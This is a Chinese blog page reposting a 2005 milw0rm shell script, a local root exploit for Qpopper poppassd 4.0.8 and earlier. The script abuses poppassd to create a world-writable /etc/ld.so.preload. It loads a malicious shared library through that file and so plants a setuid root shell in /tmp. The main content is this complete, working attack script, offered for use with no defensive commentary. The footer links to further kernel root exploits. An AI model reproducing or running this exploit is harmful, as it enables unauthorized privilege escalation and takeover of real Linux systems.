linux local root exploit,Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux)

最新推荐文章于 2022-10-30 00:11:23 发布
最新推荐文章于 2022-10-30 00:11:23 发布
阅读量91 收藏
点赞数
文章标签: linux local root exploit

#!/bin/sh

# tested and working /str0ke

###########################################################################

# Linux Qpopper poppassd latest version local r00t exploit by kcope ###

# August 2005 ###

# Confidential - Keep Private! ###

###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd

echo ""

echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"

echo ""

sleep 2

umask 0000

if [ -f /etc/ld.so.preload ]; then

echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"

exit

fi

cat > program.c << _EOF

#include <unistd.h>

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>

void _init()

{

if (!geteuid()) {

setgid(0);

setuid(0);

remove("/etc/ld.so.preload");

execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);

}

}

_EOF

gcc -o program.o -c program.c -fPIC

gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles

cat > suid.c << _EOF

int main(void) {

setgid(0); setuid(0);

unlink("/tmp/suid");

execl("/bin/sh","sh",0); }

_EOF

gcc -o /tmp/suid suid.c

cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0

echo "--- Now type ENTER ---"

echo ""

$POPPASSD_PATH -t /etc/ld.so.preload

echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload

su

if [ -f /tmp/suid ]; then

echo "IT'S A ROOTSHELL!!!"

/tmp/suid

else

echo "Sorry, exploit failed."

fi

# milw0rm.com [2005-09-24]

weixin_39528525
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
local-root-exploits:本地根开发
04-27
本地根开发 :LINUX本地根开发
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD 远程溢出
03-18
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD 远程溢出
linux local root exploit,Linux vmsplice Local Root Exploit
weixin_35626308的博客
05-12 115
#define __KERNEL__#include #define PIPE_BUFFERS16#define PG_compound14#define uintunsigned int#define static_inlinestatic inline __attribute__((always_inline))#define STACK(x)(x + sizeof(x) - 40)struc...
linux local root exploit,Linux Kernel 2.6.32 Local Root Exploit (x86_64)
weixin_39884877的博客
05-12 123
#define _GNU_SOURCE#include #include #include #include #define KSYM_NAME_LEN 127struct sym_entry {unsigned long long addr;unsigned int len;unsigned char *sym;};static struct sym_entry *table;static un...
linux local root exploit,Linux vmsplice Local Root Exploit 2.6.17 - 2.6.24.1
weixin_36221948的博客
05-12 106
/** Linux vmsplice Local Root Exploit* By qaaz** Linux 2.6.17 - 2.6.24.1*/#define _GNU_SOURCE#include #include #include #include #include #include #include #include #include #include #include #include...
Local Root Exploits
cnbird's blog
07-19 1142
https://freeworld.ws/localroot/?kernel=2.6.18
SploitFun Linux x86 Exploit 开发系列教程
05-03
SploitFun Linux x86 Exploit 开发系列教程
SploitFun Linux x86 Exploit 开发系列教程.zip
02-10
《SploitFun Linux x86 Exploit 开发系列教程》是一个深入探讨Linux x86架构下漏洞利用技术的资源集合,特别针对嵌入式Linux开发领域。本教程旨在帮助开发者和安全研究人员理解底层系统的工作原理,掌握如何发现、...
exploitLinux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Linux kernel 2.6.18-20 2009 local root exploit
cnbird's blog
12-28 1018
http://packetstormsecurity.org/0912-exploits/261820-exec.txt
Kerberos Poppassd-开源
04-24
Kerberos Poppassd是基于Pawel Krawczyk的poppassd版本1.8的密码更改守护程序。 该守护程序的工作原理与原始poppassd完全相同。 唯一的区别是此poppassd更改了用户的Kerberos 5密码。
linux local root exploit,linux非交互环境下本地提权思路与反思 linux localroot exploit
weixin_42475535的博客
05-12 320
在iptables限制非常严格的时候,无法走icmp udp tcp的bind shell或connect back shell,又需要本地提权,root了之后关闭iptables,看看能否绕过访问控制手段(当然了,如果别人是硬件的防火墙,下文解决不了问题)。在这一场景下,可以考虑参考下文的非交互式本地提权的方法,或许还有其他linux localroot exploit也能实现,实战出真知。另外...
linux local root exploit,Linux非交互环境下本地提权思路与反思 linux localroot exploit
weixin_39882870的博客
05-12 143
在iptables限制非常严格的时候,无法走icmp udp tcp的bind shell或connect back shell,又需要本地提权,root了之后关闭iptables,看看能否绕过访问控制手段(当然了,如果别人是硬件的防火墙,下文解决不了问题)。在这一场景下,可以考虑参考下文的非交互式本地提权的方法,或许还有其他linux localroot exploit也能实现,实战出真知。另外...
Linux提权详解(一)
胖虎的博客
10-30 659
Linux提权方法和详解
构建全功能的邮件系统 (转)
csd3176的博客
12-12 1142
构建全功能的邮件系统 (转)[@more@]建全功能的邮件系统张绍忠 EMail已经成为互联网上最重要的服务之一。无论菜鸟或大虾,他可能没用过FTP,没上过BBS,没有自己的主页,但他一定有一个自己的电子邮箱。随着互联网的发展,...
hmailserver php,hmailserver关于afterlogic webmail php版本下的用户密码修改功能
weixin_39525255的博客
03-10 513
hmailserver关于afterlogic webmail php版本下的用户密码修改功能(飞城原创)hmailserver作邮件服务器,squirrelmail 作邮件服务器的web界面实在是拿不出手去。换了afterlogic的webmail,界面稍微好一些,像那么回事了。今天测试,发现afterlogic有个小bug:当邮箱密码只有1位字符时,登录后邮箱同步等都有问题。跟踪代码发现密码重...
linux各版本代码量,linux各版本对应溢出漏洞总结(溢出代码)
weixin_39980184的博客
05-03 139
记录一下。2.4.17newlocalkmod2.4.18brkbrk2newlocalkmodkm.22.4.19brkbrk2newlocalkmodkm.22.4.20ptracekmodptrace-kmodkm.2brkbrk22.4.21km.2brkbrk2ptraceptrace-kmod2.4.22km.2brk2brkptraceptrace-kmod2.4.22-10logi...
LINUX 普通用户提权ROOT (完整版)SHELL版首发!!!
热门推荐
一步一个脚印
10-12 1万+
1. 在LINUX目录下建立test 帐户2.下载 a脚本 在http://milw0rm.com/exploits/84783.查看UDEV的PID  方法一: 先cat /proc/net/netlink ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2ffff810037
渗透测试之靶机试炼(二)
simple___sunny的博客
01-21 1498
123
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值